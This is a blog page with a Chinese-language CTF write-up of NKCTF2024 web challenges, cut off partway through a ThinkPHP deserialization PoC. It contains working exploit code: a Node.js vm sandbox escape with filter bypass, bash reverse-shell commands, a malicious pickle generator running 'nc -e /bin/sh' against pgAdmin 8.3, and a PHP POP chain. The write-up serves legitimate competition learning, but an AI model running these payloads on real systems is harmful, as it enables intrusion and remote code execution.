

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/I.png">
  <link rel="icon" href="/img/I.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Infernity">
  <meta name="keywords" content="">
  
    <meta name="description" content="my first cmshttps:&#x2F;&#x2F;avd.aliyun.com&#x2F;detail?id&#x3D;AVD-2024-27622 弱口令登录 username : admin password : Admin123 登录进去后：  全世界最简单的CTF给了&#x2F;secret源码 12345678910111213141516171819202122232425262728293031323334353">
<meta property="og:type" content="article">
<meta property="og:title" content="NKCTF2024">
<meta property="og:url" content="http://example.com/2024/03/25/NKCTF2024/index.html">
<meta property="og:site_name" content="Infernity&#39;s Blog">
<meta property="og:description" content="my first cmshttps:&#x2F;&#x2F;avd.aliyun.com&#x2F;detail?id&#x3D;AVD-2024-27622 弱口令登录 username : admin password : Admin123 登录进去后：  全世界最简单的CTF给了&#x2F;secret源码 12345678910111213141516171819202122232425262728293031323334353">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/background/4.jpg">
<meta property="article:published_time" content="2024-03-25T08:19:35.000Z">
<meta property="article:modified_time" content="2025-01-20T02:35:57.997Z">
<meta property="article:author" content="Infernity">
<meta property="article:tag" content="WPs">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/background/4.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>NKCTF2024 - Infernity&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":150,"cursorChar":"_","loop":true,"scope":["home"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Infernity&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/friends/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>friends</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background/19.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle">NKCTF2024</span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-25 16:19" pubdate>
          2024年3月25日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          13 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">NKCTF2024</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="my-first-cms"><a href="#my-first-cms" class="headerlink" title="my first cms"></a>my first cms</h1><p><a target="_blank" rel="noopener" href="https://avd.aliyun.com/detail?id=AVD-2024-27622">https://avd.aliyun.com/detail?id=AVD-2024-27622</a></p>
<p>弱口令登录</p>
<p>username : admin</p>
<p>password : Admin123</p>
<p>登录进去后：</p>
<p><img src="/img/NKCTF2024/1.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="全世界最简单的CTF"><a href="#全世界最简单的CTF" class="headerlink" title="全世界最简单的CTF"></a>全世界最简单的CTF</h1><p>给了&#x2F;secret源码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">const</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>);<br><span class="hljs-keyword">const</span> bodyParser = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;body-parser&#x27;</span>);<br><span class="hljs-keyword">const</span> app = <span class="hljs-title function_">express</span>();<br><span class="hljs-keyword">const</span> fs = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;fs&quot;</span>);<br><span class="hljs-keyword">const</span> path = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;path&#x27;</span>);<br><span class="hljs-keyword">const</span> vm = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;vm&quot;</span>);<br><br>app<br>  .<span class="hljs-title function_">use</span>(bodyParser.<span class="hljs-title function_">json</span>())<br>  .<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;views&#x27;</span>, path.<span class="hljs-title function_">join</span>(__dirname, <span class="hljs-string">&#x27;views&#x27;</span>))<br>  .<span class="hljs-title function_">use</span>(express.<span class="hljs-title function_">static</span>(path.<span class="hljs-title function_">join</span>(__dirname, <span class="hljs-string">&#x27;/public&#x27;</span>)))<br><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>)&#123;<br>  res.<span class="hljs-title function_">sendFile</span>(__dirname + <span class="hljs-string">&#x27;/public/home.html&#x27;</span>);<br>&#125;)<br><br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">waf</span>(<span class="hljs-params">code</span>) &#123;<br>  <span class="hljs-keyword">let</span> pattern = <span class="hljs-regexp">/(process|\[.*?\]|exec|spawn|Buffer|\\|\+|concat|eval|Function)/g</span>;<br>  <span class="hljs-keyword">if</span>(code.<span class="hljs-title function_">match</span>(pattern))&#123;<br>    <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Error</span>(<span class="hljs-string">&quot;what can I say? hacker out!!&quot;</span>);<br>  &#125;<br>&#125;<br><br>app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>)&#123;<br>  <span class="hljs-keyword">let</span> code = req.<span class="hljs-property">body</span>.<span class="hljs-property">code</span>;<br>  <span class="hljs-keyword">let</span> sandbox = <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">create</span>(<span class="hljs-literal">null</span>);<br>  <span class="hljs-keyword">let</span> context = vm.<span class="hljs-title function_">createContext</span>(sandbox);<br>  <span class="hljs-keyword">try</span> &#123;<br>    <span class="hljs-title function_">waf</span>(code)<br>    <span class="hljs-keyword">let</span> result = vm.<span class="hljs-title function_">runInContext</span>(code, context);<br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(result);<br>  &#125; <span class="hljs-keyword">catch</span> (e)&#123;<br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(e.<span class="hljs-property">message</span>);<br>    <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;./hack&#x27;</span>);<br>  &#125;<br>&#125;)<br><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/secret&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>)&#123;<br>  <span class="hljs-keyword">if</span>(process.<span class="hljs-property">__filename</span> == <span class="hljs-literal">null</span>) &#123;<br>    <span class="hljs-keyword">let</span> content = fs.<span class="hljs-title function_">readFileSync</span>(__filename, <span class="hljs-string">&quot;utf-8&quot;</span>);<br>    <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(content);<br>  &#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-keyword">let</span> content = fs.<span class="hljs-title function_">readFileSync</span>(process.<span class="hljs-property">__filename</span>, <span class="hljs-string">&quot;utf-8&quot;</span>);<br>    <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">send</span>(content);<br>  &#125;<br>&#125;)<br><br><br>app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">3000</span>, <span class="hljs-function">()=&gt;</span>&#123;<br>  <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;listen on 3000&quot;</span>);<br>&#125;)<br><br></code></pre></td></tr></table></figure>

<p>注意第25行开始的，很明显的vm沙箱逃逸。</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11859?time__1311=mqmx0DBD9DyDuBYD/QbiQQLpDfhxAOiqhiD&alichlgref=https://www.bing.com/#toc-3">https://xz.aliyun.com/t/11859?time__1311=mqmx0DBD9DyDuBYD%2FQbiQQLpDfhxAOiqhiD&amp;alichlgref=https%3A%2F%2Fwww.bing.com%2F#toc-3</a></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Proxy</span>(&#123;&#125;, &#123;<br>        <span class="hljs-attr">get</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123;<br>            <span class="hljs-keyword">const</span> cc = <span class="hljs-variable language_">arguments</span>.<span class="hljs-property">callee</span>.<span class="hljs-property">caller</span>;<br>            <span class="hljs-keyword">const</span> p = (cc.<span class="hljs-property">constructor</span>.<span class="hljs-title function_">constructor</span>(<span class="hljs-params"><span class="hljs-string">&#x27;return process&#x27;</span></span>))();<br>            <span class="hljs-keyword">return</span> p.<span class="hljs-property">mainModule</span>.<span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>).<span class="hljs-title function_">execSync</span>(<span class="hljs-string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&#x27;&quot;</span>).<span class="hljs-title function_">toString</span>();<br>        &#125;<br>    &#125;)<br></code></pre></td></tr></table></figure>

<p>这道题没回显，所以我们需要反弹shell，拿这个payload去打，剩下的是绕过过滤，这里过滤了我们需要的exec、process</p>
<p>对于process，他正则匹配没有i 也就是对大小写不敏感 我们可以通过js里面的 toLowerCase()绕过</p>
<figure class="highlight vhdl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vhdl"><span class="hljs-symbol">&#x27;return</span> <span class="hljs-keyword">process</span>&#x27;变成<span class="hljs-symbol">&#x27;return</span> <span class="hljs-keyword">Process</span>&#x27;.toLowerCase();<br></code></pre></td></tr></table></figure>

<p>最难的是exec绕过，这个东西不是字符串，而是方法，所以我们并不能像之前两种方式绕过，我们选择 Reflect.get  方法绕过</p>
<p>推一篇文章nodejs的命令执行绕过的</p>
<p> <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/237032">https://www.anquanke.com/post/id/237032</a></p>
<p><img src="/img/NKCTF2024/2.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/3.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>简单点就是<strong>Reflect.get(a,b)&#x3D;a[b]</strong></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Proxy</span>(&#123;&#125;, &#123;<br>        <span class="hljs-attr">get</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123;<br>            <span class="hljs-keyword">const</span> cc = <span class="hljs-variable language_">arguments</span>.<span class="hljs-property">callee</span>.<span class="hljs-property">caller</span>;<br>            <span class="hljs-keyword">const</span> g = (cc.<span class="hljs-property">constructor</span>.<span class="hljs-title function_">constructor</span>(<span class="hljs-params"><span class="hljs-string">&#x27;return global&#x27;</span></span>))();   <span class="hljs-comment">//拿到所有函数</span><br>            <span class="hljs-keyword">const</span> p = <span class="hljs-title class_">Reflect</span>.<span class="hljs-title function_">get</span>(g, <span class="hljs-title class_">Reflect</span>.<span class="hljs-title function_">ownKeys</span>(g).<span class="hljs-title function_">find</span>(<span class="hljs-function"><span class="hljs-params">x</span>=&gt;</span>x.<span class="hljs-title function_">includes</span>(<span class="hljs-string">&#x27;pro&#x27;</span>))).<span class="hljs-property">mainModule</span>.<span class="hljs-built_in">require</span>(<span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>(<span class="hljs-number">99</span>,<span class="hljs-number">104</span>,<span class="hljs-number">105</span>,<span class="hljs-number">108</span>,<span class="hljs-number">100</span>,<span class="hljs-number">95</span>,<span class="hljs-number">112</span>,<span class="hljs-number">114</span>,<span class="hljs-number">111</span>,<span class="hljs-number">99</span>,<span class="hljs-number">101</span>,<span class="hljs-number">115</span>,<span class="hljs-number">115</span>));<span class="hljs-comment">//编码绕过构造process.mainModule.require(&#x27;child_process&#x27;)</span><br>            <span class="hljs-keyword">return</span> <span class="hljs-title class_">Reflect</span>.<span class="hljs-title function_">get</span>(p, <span class="hljs-title class_">Reflect</span>.<span class="hljs-title function_">ownKeys</span>(p).<span class="hljs-title function_">find</span>(<span class="hljs-function"><span class="hljs-params">x</span>=&gt;</span>x.<span class="hljs-title function_">includes</span>(<span class="hljs-string">&#x27;exe&#x27;</span>)))(<span class="hljs-string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&#x27;&quot;</span>).<span class="hljs-title function_">toString</span>();<span class="hljs-comment">//构造exec函数</span><br>        &#125;<br>    &#125;)<br></code></pre></td></tr></table></figure>

<p><img src="/img/NKCTF2024/4.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="attack-tacooooo"><a href="#attack-tacooooo" class="headerlink" title="attack_tacooooo"></a>attack_tacooooo</h1><p>又要猜密码</p>
<p>给了帐号是<a href="mailto:&#116;&#97;&#99;&#111;&#x6f;&#x6f;&#x6f;&#x6f;&#64;&#x71;&#x71;&#x2e;&#99;&#x6f;&#109;">&#116;&#97;&#99;&#111;&#x6f;&#x6f;&#x6f;&#x6f;&#64;&#x71;&#x71;&#x2e;&#99;&#x6f;&#109;</a>，我怎么知道密码是多少，这还不是弱口令，纯猜，密码是tacooooo</p>
<p>登录进去后查看版本 pgAdmin4 8.3</p>
<p>直接去找漏洞，翻cve</p>
<p><a target="_blank" rel="noopener" href="https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/">https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/</a></p>
<p><img src="/img/NKCTF2024/5.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/6.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/7.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/8.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>脚本也给了，我们稍微改改</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> struct<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">produce_pickle_bytes</span>(<span class="hljs-params">platform, cmd</span>):<br>    b = <span class="hljs-string">b&#x27;\x80\x04\x95&#x27;</span><br>    b += struct.pack(<span class="hljs-string">&#x27;L&#x27;</span>, <span class="hljs-number">22</span> + <span class="hljs-built_in">len</span>(platform) + <span class="hljs-built_in">len</span>(cmd))<br>    b += <span class="hljs-string">b&#x27;\x8c&#x27;</span> + struct.pack(<span class="hljs-string">&#x27;b&#x27;</span>, <span class="hljs-built_in">len</span>(platform)) + platform.encode()<br>    b += <span class="hljs-string">b&#x27;\x94\x8c\x06system\x94\x93\x94&#x27;</span><br>    b += <span class="hljs-string">b&#x27;\x8c&#x27;</span> + struct.pack(<span class="hljs-string">&#x27;b&#x27;</span>, <span class="hljs-built_in">len</span>(cmd)) + cmd.encode()<br>    b += <span class="hljs-string">b&#x27;\x94\x85\x94R\x94.&#x27;</span><br>    <span class="hljs-built_in">print</span>(b)<br>    <span class="hljs-keyword">return</span> b<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;posix.pickle&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>        f.write(produce_pickle_bytes(<span class="hljs-string">&#x27;posix&#x27;</span>, <span class="hljs-string">f&quot;nc ip port -e /bin/sh&quot;</span>))<br></code></pre></td></tr></table></figure>

<p>把运行脚本得到的pickle文件上传</p>
<p><img src="/img/NKCTF2024/9.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/10.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>注意这里是绝对路径</p>
<p> &#x2F;var&#x2F;lib&#x2F;pgadmin&#x2F;storage&#x2F;tacooooo_qq.com&#x2F;posix.pickle!a  </p>
<p>更换cookie之后监听端口，拿到shell结果半天找不到flag，最后在&#x2F;proc&#x2F;1&#x2F;environ里才找到flag</p>
<p><img src="/img/NKCTF2024/11.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h1 id="用过就是熟悉"><a href="#用过就是熟悉" class="headerlink" title="用过就是熟悉"></a>用过就是熟悉</h1><p>下载源码，在db.sql的938行，找到登录密码：!@!@!@!@NKCTFChu0</p>
<p><img src="/img/NKCTF2024/12.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>登录进去后发现回收站里有个文件，我们恢复了。</p>
<p><img src="/img/NKCTF2024/13.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>打开后发现这个文件是一个木马：</p>
<p><img src="/img/NKCTF2024/14.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>那我们一个尝试文件包含它，然后执行命令。</p>
<h3 id="下面开始审计源码："><a href="#下面开始审计源码：" class="headerlink" title="下面开始审计源码："></a>下面开始审计源码：</h3><p>登陆页面源码在&#x2F;app&#x2F;controller&#x2F;user&#x2F;include.class.php</p>
<p>在loginSubmit方法里有这么一句：</p>
<p><img src="/img/NKCTF2024/15.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>这里他说的tp是thinkphp的意思，然后在这里有个反序列化的点，那么我们肯定就需要构造反序列化链条攻击了。</p>
<p>thinkphp链子开头一般是__destruct，直接全局搜索一下：</p>
<p><img src="/img/NKCTF2024/16.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>发现有三个，而前两个的__destruct()无法成功构成链子，只有第三个可以：</p>
<p><img src="/img/NKCTF2024/17.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>根据p2zhh师傅的提示，这个链子跟thinkphp5.0.24反序列化漏洞很像。</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/284091.html">https://www.freebuf.com/articles/web/284091.html</a></p>
<p>这里的close()为关闭文件的方法，没有利用点，而removeFiles()中有个数组可以触发__toString</p>
<p>全局搜素__toString，根据文章的提示，会到这里</p>
<p><img src="/img/NKCTF2024/18.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>跟进toJson</p>
<p><img src="/img/NKCTF2024/19.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>跟进toArray()</p>
<p><img src="/img/NKCTF2024/20.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p><img src="/img/NKCTF2024/21.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>因为$items是受保护的属性，所以这里toArray()可以触发__get方法。</p>
<p><img src="/img/NKCTF2024/22.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>这里的data是我们可控的。这里Loginsubmit方法不存在，所以我们就能调用__call方法 这里我们找到两个__call方法：</p>
<p>在Config.php中，这个__call能进行文件包含。</p>
<p><img src="/img/NKCTF2024/23.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>先放poc：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>\<span class="hljs-title class_">process</span>\<span class="hljs-title class_">pipes</span>;<br><span class="hljs-keyword">use</span> <span class="hljs-title">think</span>\<span class="hljs-title">Collection</span>;              <span class="hljs-comment">//在链子起点Windows.php页面找到依赖，也写到这里，相当于包含其他文件，因为我们这里是跨文件的链条。</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Pipes</span></span>&#123;                     <span class="hljs-comment">//windows类的父类，不要会报错</span><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Windows</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Pipes</span></span>&#123;             <span class="hljs-comment">//windows类的起点。</span><br>  <span class="hljs-keyword">private</span> <span class="hljs-variable">$files</span> = [];                  <span class="hljs-comment">//这里是数组。</span><br><br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable language_">$this</span>-&gt;files = [<span class="hljs-keyword">new</span> <span class="hljs-title class_">Collection</span>()];<span class="hljs-comment">//触发Collection类里的__toString()-&gt;toJson()-&gt;toArray()</span><br>  &#125;<br>&#125;<br><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>;                     <span class="hljs-comment">//不写会报错</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Collection</span></span>&#123;<br>  <span class="hljs-keyword">protected</span> <span class="hljs-variable">$items</span> = [];<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span>  <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable language_">$this</span>-&gt;items=<span class="hljs-keyword">new</span> <span class="hljs-title class_">View</span>();              <span class="hljs-comment">//触发view类里的__get()</span><br>  &#125;<br>&#125;<br><br><span class="hljs-keyword">namespace</span> <span class="hljs-title class_">think</span>;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Config</span></span>&#123;                          <span class="hljs-comment">//包含文件__call方法所属的类</span><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">View</span></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$engine</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;name&quot;</span>=&gt;<span class="hljs-string">&quot;data/files/shell&quot;</span>);          <span 